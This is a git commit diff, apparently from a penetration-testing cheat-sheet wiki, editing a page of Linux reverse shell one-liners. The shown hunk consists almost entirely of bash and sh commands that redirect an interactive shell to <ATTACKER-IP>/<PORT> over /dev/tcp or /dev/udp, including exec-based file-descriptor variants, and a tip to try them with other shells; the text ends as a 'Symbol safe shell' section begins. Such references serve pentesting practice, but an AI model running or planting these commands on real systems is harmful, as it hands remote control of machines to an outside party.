GitBook: [master] one page modified

This commit is contained in:
CPol 2020-12-01 17:37:29 +00:00 committed by gitbook-bot
parent b98b71e3c8
commit 92b8715bb3
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF

View File

@ -10,11 +10,13 @@
```bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
sh -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
```
Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash
### Symbol safe shell
```bash